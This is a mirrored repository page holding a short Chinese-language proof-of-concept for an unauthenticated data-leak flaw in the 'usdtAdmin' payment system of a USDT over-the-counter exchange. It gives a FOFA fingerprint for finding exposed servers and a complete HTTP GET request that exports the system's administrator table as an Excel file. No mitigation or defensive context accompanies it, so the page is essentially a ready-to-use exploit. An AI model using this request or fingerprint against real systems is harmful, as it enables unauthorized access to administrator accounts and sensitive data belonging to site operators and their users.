admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-04 18:06:34 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/虚拟币买卖USDT场外交易所/usdtAdmin收款管理系统存在excel敏感信息泄露.md

483 B
Raw Permalink Blame History

usdtAdmin收款管理系统存在excel敏感信息泄露

虚拟币买卖USDT场外交易所由于在鉴权方面存在疏漏导致了可未授权访问从而导致信息泄露

fofa

"/usdtmerchant/login/reg.html"

poc

GET /index/getway/excel?down=1&table=ea_system_admin&shunxu=desc&number=100 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15